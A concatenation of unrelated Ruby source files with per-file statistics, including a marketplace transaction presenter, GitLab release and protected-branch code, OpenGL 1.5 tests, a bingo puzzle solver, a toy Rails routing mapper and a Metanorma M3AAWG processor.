end
def shipping_price
transaction.shipping_price
end
def unit_type
transaction.unit_type
end
def start_time
booking_per_hour ? transaction.booking.start_time : nil
end
def end_time
booking_per_hour ? transaction.booking.end_time : nil
end
def buyer_fee
transaction.buyer_commission
end
def has_buyer_fee
buyer_fee.present? && buyer_fee.positive?
end
def has_provider_fee
fee.present? && fee.positive?
end
def marketplace_collects
[fee, buyer_fee].compact.sum
end
def messages_and_actions
@messages_and_actions ||= TransactionViewUtils.merge_messages_and_transitions(
TransactionViewUtils.conversation_messages(transaction.conversation.messages, community.name_display_type),
TransactionViewUtils.transition_messages(transaction, transaction.conversation, community)).reverse
end
def preauthorized?
transaction.current_state == 'preauthorized'
end
def paid?
transaction.current_state == 'paid'
end
def disputed?
transaction.current_state == 'disputed'
end
def show_next_step?
preauthorized? || paid? || disputed?
end
def buyer
transaction.starter
end
def buyer_name
buyer ? PersonViewUtils.person_display_name(buyer, community) : 'X'
end
def provider
transaction.author
end
def provider_name
provider ? PersonViewUtils.person_display_name(provider, community) : 'X'
end
def completed?
%w[confirmed canceled refunded].include?(transaction.current_state)
end
def shipping?
transaction.delivery_method == 'shipping'
end
def pickup?
transaction.delivery_method == 'pickup'
end
def shipping_address
return @shipping_address if defined?(@shipping_address)
@shipping_address = nil
fields = %i[name phone street1 street2 postal_code city state_or_province country]
if transaction.shipping_address
address = transaction.shipping_address.slice(*fields)
if address.values.any?
address[:country] ||= CountryI18nHelper.translate_country(shipping_address[:country_code])
@shipping_address = fields.map{|field| address[field]}.select{|x| x.present?}.join(', ')
end
end
@shipping_address
end
def show_transactions_export?
!personal? && !has_search?
end
def personal?
service.personal
end
def conversations_with_buyer
convs_service = conversations_service(buyer_name)
conversations = convs_service.conversations.reverse
@conversations_with_buyer ||= ConversationViewUtils.conversations(conversations, community, convs_service).reverse
end
def conversations_with_seller
convs_service = conversations_service(provider_name)
conversations = convs_service.conversations.reverse
@conversations_with_seller ||= ConversationViewUtils.conversations(conversations, community, convs_service).reverse
end
def conversations_service(for_person)
params = {
sort: "started",
page: 1,
q: for_person
}
Admin2::ConversationsService.new(
community: community,
params: params)
end
end
| 24.049242 | 135 | 0.735076 |
7a22bced12009480ffb8c5e143cc914769e8cdf6 | 1,283 | # frozen_string_literal: true
module ReleaseTools
module TraceSection
def self.collapse(summary, icon: nil)
title =
if icon
"#{icon} #{summary}"
else
summary
end
section = section_name(summary)
puts "section_start:#{Time.now.to_i}:#{section}[collapsed=true]\r\e[0K#{title}"
ret = yield
close(section)
ret
rescue StandardError => ex
close(section)
# If we don't handle the error, it's displayed within the collapsed
# section, which can be confusing. Handling the error allows us to close
# the section first, and display it outside of the section.
puts "❌ The section #{summary.inspect} produced an error:".colorize(:red)
raise ex
end
def self.close(section)
# Flush any output so we capture it in the section, instead of it being
# buffered and displayed outside of the section.
#
# We flush here so that for both the happy and error path we flush the
# output first.
$stdout.flush
$stderr.flush
SemanticLogger.flush
puts "section_end:#{Time.now.to_i}:#{section}\r\e[0K"
end
def self.section_name(summary)
summary.downcase.tr(':', '-').gsub(/\s+/, '_')
end
end
end
| 26.183673 | 85 | 0.624318 |
5db14bd19cd351e4b937c82881ce2728b701054f | 1,458 | module Pokotarou
module RegistrationConfigMaker
class ConfigDomain
class << self
def has_dush_import_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"import'")
end
def has_dush_template_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"template'")
end
def has_dush_template_path_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"template_path'")
end
def has_dush_preset_path_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"preset_path'")
end
def has_grouping_syntax? model_content
return false if model_content.blank?
return model_content.has_key?(:grouping)
end
def has_template_syntax? model_content
return false if model_content.blank?
return model_content.has_key?(:template)
end
def has_seed_data_syntax? col_config, col_name_sym
return false if col_config.blank?
return col_config.has_key?(col_name_sym)
end
DUSH_OPTION_REGEX = /^.*\'$/
def is_dush_syntax? syntax
return false unless syntax.kind_of?(String)
return DUSH_OPTION_REGEX =~ syntax
end
end
end
end
end | 30.375 | 58 | 0.635802 |
1cabd5de2379ab624e7b1ef368ee5ad0d3c65603 | 88 | json.partial! 'operating_systems/operating_system', operating_system: @operating_system
| 44 | 87 | 0.863636 |
ed93be34f67f0e7a6375b98aff47ce4d79fd2aac | 2,201 | INPUT = 'input.txt'
@numbers = Array.new
@boards = Array.new
file_lines = File.readlines(INPUT)
@numbers = file_lines.shift.chomp.split(',').collect(&:to_i)
board = nil
row = 0
file_lines.each do |line|
if line.chomp == ''
@boards << board if board
board = Hash.new
row = 0
next
end
board[:cols] ||= Hash.new
board[:rows] ||= Hash.new
board[:winner] = false
board[:won_at] = nil
board[:win_number_order] = nil
line.chomp.split(' ').each_with_index do |number, index|
position = Hash.new
position[:number] = number.to_i
position[:chosen] = false
board[:cols][index] ||= Array.new
board[:cols][index] << position
board[:rows][row] ||= Array.new
board[:rows][row] << position
end
row += 1
end
@boards << board
def process_position(position, number)
if position[:number] == number
position[:chosen] = true
end
return position[:chosen]
end
def check_win(position_array)
position_array.length == position_array.count{|pos| pos[:chosen] == true}
end
@numbers.each_with_index do |number, index|
#find the number in each board
@boards.each do |board|
next if board[:winner]
board[:cols].each do |col_idx, position_arr|
position_arr.each do |position|
if process_position(position, number)
if check_win(board[:cols][col_idx])
board[:winner] = true
board[:won_at] = number
board[:win_number_order] = index
end
end
end
end
board[:rows].each do |row_idx, position_arr|
position_arr.each do |position|
if process_position(position, number)
if check_win(board[:rows][row_idx])
board[:winner] = true
board[:won_at] = number
board[:win_number_order] = index
end
end
end
end
end
end
@winning_board = @boards.max{|a, b| a[:win_number_order] <=> b[:win_number_order]}
pp @winning_board
#score it
unmarked_score = @winning_board[:rows].reduce(0) do |acc, row|
position_arr = row[1]
losers = position_arr.select{|pos| pos[:chosen] == false}
acc += losers.sum{|pos| pos[:number]}
end
pp unmarked_score * @winning_board[:won_at]
| 25.593023 | 82 | 0.632894 |
7967ff81075feae78126269ff1c2693c19582752 | 1,188 | # frozen_string_literal: true
require 'spec_helper'
describe ProtectedBranches::UpdateService do
let(:protected_branch) { create(:protected_branch) }
let(:project) { protected_branch.project }
let(:user) { project.owner }
let(:params) { { name: 'new protected branch name' } }
describe '#execute' do
subject(:service) { described_class.new(project, user, params) }
it 'updates a protected branch' do
result = service.execute(protected_branch)
expect(result.reload.name).to eq(params[:name])
end
context 'without admin_project permissions' do
let(:user) { create(:user) }
it "raises error" do
expect { service.execute(protected_branch) }.to raise_error(Gitlab::Access::AccessDeniedError)
end
end
context 'when a policy restricts rule creation' do
before do
policy = instance_double(ProtectedBranchPolicy, can?: false)
expect(ProtectedBranchPolicy).to receive(:new).and_return(policy)
end
it "prevents creation of the protected branch rule" do
expect { service.execute(protected_branch) }.to raise_error(Gitlab::Access::AccessDeniedError)
end
end
end
end
| 29.7 | 102 | 0.695286 |
ac1956275c79351118b7ef9715b535a61a38e8fa | 456 | RSpec.shared_examples 'new record attributes' do
it 'has a name' do
expect(object.name).to eq attributes[:name]
end
it 'has a description' do
expect(object.description).to eq attributes[:description]
end
it 'has a short description' do
expect(object.short_description).to eq attributes[:short_description]
end
it 'has submission details' do
expect(object.submission_details).to eq attributes[:submission_details]
end
end
| 25.333333 | 75 | 0.743421 |
bb671c4ae4dbcaa5922ab5942b031c99ae829574 | 7,673 | #
# Copyright (C) 2007 Jan Dvorak <[email protected]>
#
# This program is distributed under the terms of the MIT license.
# See the included MIT-LICENSE file for the terms of this license.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
require 'opengl/test_case'
class TestGl15 < OpenGL::TestCase
def setup
super
supported? 1.5
end
def test_query
queries = glGenQueries 2
assert_equal 2, queries.length
glBeginQuery GL_SAMPLES_PASSED, queries[1]
assert glIsQuery(queries[1])
glBegin GL_TRIANGLES do
glVertex2i 0, 0
glVertex2i 1, 0
glVertex2i 1, 1
end
assert_equal queries[1], glGetQueryiv(GL_SAMPLES_PASSED, GL_CURRENT_QUERY)
glEndQuery GL_SAMPLES_PASSED
r = glGetQueryObjectiv queries[1], GL_QUERY_RESULT_AVAILABLE
assert(r == GL_TRUE || r == GL_FALSE)
if r == GL_TRUE
assert_operator 0, :<=, glGetQueryObjectiv(queries[1], GL_QUERY_RESULT)[0]
assert_operator 0, :<=, glGetQueryObjectuiv(queries[1], GL_QUERY_RESULT)[0]
end
glDeleteQueries queries
refute glIsQuery queries[1]
end
def test_buffers
buffers = glGenBuffers(2)
glBindBuffer(GL_ARRAY_BUFFER, buffers[0])
assert glIsBuffer buffers[0]
data = [0, 1, 2, 3].pack("C*")
data2 = [4, 5, 6, 7].pack("C*")
glBufferData(GL_ARRAY_BUFFER, 4, data, GL_STREAM_READ)
assert_equal data, glGetBufferSubData(GL_ARRAY_BUFFER, 0, 4)
assert_equal GL_STREAM_READ, glGetBufferParameteriv(GL_ARRAY_BUFFER, GL_BUFFER_USAGE)
glBufferSubData(GL_ARRAY_BUFFER, 0, 4, data2)
assert_equal data2, glGetBufferSubData(GL_ARRAY_BUFFER, 0, 4)
assert_equal data2, glMapBuffer(GL_ARRAY_BUFFER, GL_READ_ONLY)
r = glUnmapBuffer(GL_ARRAY_BUFFER)
assert(r == true || r == false)
glDeleteBuffers(buffers)
refute glIsBuffer(buffers[0])
# FIXME: GetBufferPointerv not yet implemented
end
def test_buffer_binding_element_array
glEnableClientState(GL_VERTEX_ARRAY)
va = [0, 0, 0, 1, 1, 1].pack("f*")
glVertexPointer(2, GL_FLOAT, 0, va)
#
data = [0, 1, 2].pack("C*")
buffers = glGenBuffers(1)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, buffers[0])
glBufferData(GL_ELEMENT_ARRAY_BUFFER, 3, data, GL_DYNAMIC_DRAW)
#
feedback = glFeedbackBuffer(256, GL_3D)
glRenderMode(GL_FEEDBACK)
glDrawElements(GL_TRIANGLES, 3, GL_UNSIGNED_BYTE, 0)
glDrawRangeElements(GL_TRIANGLES, 0, 3, 3, GL_UNSIGNED_BYTE, 0)
count = glRenderMode(GL_RENDER)
assert_equal 22, count
glDisableClientState(GL_VERTEX_ARRAY)
glDeleteBuffers(buffers)
end
def test_buffer_binding_array_1
glEnableClientState(GL_VERTEX_ARRAY)
va = [0, 0, 0, 1, 1, 1].pack("f*")
#
buffers = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, buffers[0])
glBufferData(GL_ARRAY_BUFFER, 6*4, va, GL_DYNAMIC_DRAW)
glVertexPointer(2, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_VERTEX_ARRAY_POINTER)
#
feedback = glFeedbackBuffer(256, GL_3D)
glRenderMode(GL_FEEDBACK)
glDrawElements(GL_TRIANGLES, 3, GL_UNSIGNED_BYTE, [0, 1, 2].pack("f*"))
count = glRenderMode(GL_RENDER)
assert_equal 11, count
glDeleteBuffers(buffers)
glDisableClientState(GL_VERTEX_ARRAY)
end
def test_buffer_binding_array_2
efa = [0].pack("C*")
na = [0, 1, 0].pack("f*")
ca = [1, 0, 1, 0].pack("f*")
ta = [1, 0, 1, 0].pack("f*")
buffers = glGenBuffers(4)
# load data into buffers
buffer_efa, buffer_na, buffer_ca, buffer_ta = buffers
glBindBuffer(GL_ARRAY_BUFFER, buffer_efa)
glBufferData(GL_ARRAY_BUFFER, 1, efa, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_na)
glBufferData(GL_ARRAY_BUFFER, 3*4, na, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ca)
glBufferData(GL_ARRAY_BUFFER, 4*4, ca, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ta)
glBufferData(GL_ARRAY_BUFFER, 4*4, ta, GL_DYNAMIC_DRAW)
# load buffers into arrays
glBindBuffer(GL_ARRAY_BUFFER, buffer_na)
glEdgeFlagPointer(0, 0)
assert_equal 0, glGetPointerv(GL_EDGE_FLAG_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_na)
glNormalPointer(GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_NORMAL_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ca)
glColorPointer(4, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_COLOR_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ta)
glTexCoordPointer(4, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_TEXTURE_COORD_ARRAY_POINTER)
# not really testing index
glIndexPointer(GL_INT, 2, 0)
assert_equal 0, glGetPointerv(GL_INDEX_ARRAY_POINTER)
# draw arrays
glEnableClientState(GL_NORMAL_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
glEnableClientState(GL_TEXTURE_COORD_ARRAY)
glEnableClientState(GL_EDGE_FLAG_ARRAY)
glBegin(GL_TRIANGLES)
glArrayElement(0)
glEnd()
assert_equal [0, 1, 0], glGetDoublev(GL_CURRENT_NORMAL)
assert_equal [1, 0, 1, 0], glGetDoublev(GL_CURRENT_COLOR)
assert_equal [1, 0, 1, 0], glGetDoublev(GL_CURRENT_TEXTURE_COORDS)
assert_equal GL_FALSE, glGetBooleanv(GL_EDGE_FLAG)
glDisableClientState(GL_EDGE_FLAG_ARRAY)
glDisableClientState(GL_TEXTURE_COORD_ARRAY)
glDisableClientState(GL_COLOR_ARRAY)
glDisableClientState(GL_NORMAL_ARRAY)
glDeleteBuffers(buffers)
end
def test_buffer_binding_array_3
sc = [0, 1, 0].pack("f*")
fc = [1].pack("f*")
buffers = glGenBuffers(2)
# load data into buffers
buffer_sc, buffer_fc = buffers
glBindBuffer(GL_ARRAY_BUFFER, buffer_sc)
glBufferData(GL_ARRAY_BUFFER, 3*4, sc, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_fc)
glBufferData(GL_ARRAY_BUFFER, 1*4, fc, GL_DYNAMIC_DRAW)
# load buffers into arrays
glBindBuffer(GL_ARRAY_BUFFER, buffer_sc)
glSecondaryColorPointer(3, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_SECONDARY_COLOR_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_fc)
glFogCoordPointer(GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_FOG_COORD_ARRAY_POINTER)
# draw arrays
glEnableClientState(GL_SECONDARY_COLOR_ARRAY)
glEnableClientState(GL_FOG_COORD_ARRAY)
glBegin(GL_TRIANGLES)
glArrayElement(0)
glEnd()
assert_equal [0, 1, 0, 1], glGetDoublev(GL_CURRENT_SECONDARY_COLOR)
assert_equal 1, glGetDoublev(GL_CURRENT_FOG_COORD)
glDisableClientState(GL_SECONDARY_COLOR_ARRAY)
glDisableClientState(GL_FOG_COORD_ARRAY)
glDeleteBuffers(buffers)
end
def test_buffer_binding_array_4
va = [0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1].pack("f*")
glVertexPointer(2, GL_FLOAT, 0, va)
glEnableClientState(GL_VERTEX_ARRAY)
buf = glFeedbackBuffer(256, GL_3D)
glRenderMode(GL_FEEDBACK)
data = [0, 1, 2, 3, 4, 5]
buffers = glGenBuffers(3)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, buffers[0])
glBufferData(GL_ELEMENT_ARRAY_BUFFER, 6, data.pack("C*"), GL_DYNAMIC_DRAW)
glMultiDrawElements(GL_TRIANGLES, GL_UNSIGNED_BYTE, [3, 3], [0, 3])
count = glRenderMode(GL_RENDER)
assert_equal 2 * (3 * 3 + 2), count
glDisableClientState(GL_VERTEX_ARRAY)
glDeleteBuffers(buffers)
end
end
| 29.398467 | 89 | 0.726443 |
b95112f9f3abd824e3fb76a5b57ce43bb6ee9e75 | 39 | module DaFace
VERSION = "0.0.12"
end
| 9.75 | 20 | 0.666667 |
ac479222b1062be6ae0160795e0b61526acedc32 | 153 | # frozen_string_literal: true
require 'test_helper'
class AttendeeTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 15.3 | 44 | 0.72549 |
5d8b29acb98531ae5286abceb541b738e355903d | 998 | module ActionDispatch
module Routing
class Mapper
def initialize(route_set)
@route_set = route_set
end
# 解析生成路径
# 并加入路径列表中
# 一开始把 as赋值为 nil
def get(path, to:, as: nil)
# to => "controller#index"
# 这里的 to 是键值对的 key
# 直接取它的 value
controller, action = to.split('#')
@route_set.add_route('GET', path, controller, action, as)
# p "====="
# p @route_set
end
def root(to:)
get '/', to: to, as: 'root'
end
# 解析路径
# 并通过 get 方法将路径加入 @route_set 路径列表中
def resources(plural_name)
get "/#{plural_name}", to: "#{plural_name}#index", as: plural_name.to_s
get "/#{plural_name}/new", to: "#{plural_name}#new",
as: 'new_' + plural_name.to_s.singularize
get "/#{plural_name}/show", to: "#{plural_name}#show",
as: plural_name.to_s.singularize
end
end
end
end
| 26.972973 | 79 | 0.519038 |
0359868c3aa90b99c8da8c73a4006f4a0038a88e | 1,418 | require "metanorma/processor"
module Metanorma
module M3AAWG
class Processor < Metanorma::Generic::Processor
def configuration
Metanorma::Ribose.configuration
end
def initialize
@short = [:m3d, :m3aawg]
@input_format = :asciidoc
@asciidoctor_backend = :m3aawg
end
def output_formats
super.merge(
html: "html",
doc: "doc",
pdf: "pdf"
)
end
def fonts_manifest
{
"Arial" => nil,
"Cambria Math" => nil,
"Courier New" => nil,
"EB Garamond 12" => nil,
"Overpass" => nil,
"Space Mono" => nil,
}
end
def version
"Metanorma::M3AAWG #{Metanorma::M3AAWG::VERSION}"
end
def output(isodoc_node, inname, outname, format, options={})
case format
when :html
IsoDoc::M3AAWG::HtmlConvert.new(options).convert(inname, isodoc_node, nil, outname)
when :doc
IsoDoc::M3AAWG::WordConvert.new(options).convert(inname, isodoc_node, nil, outname)
when :pdf
IsoDoc::M3AAWG::PdfConvert.new(options).convert(inname, isodoc_node, nil, outname)
when :presentation
IsoDoc::M3AAWG::PresentationXMLConvert.new(options).convert(inname, isodoc_node, nil, outname)
else
super
end
end
end
end
end
| 24.877193 | 104 | 0.565585 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.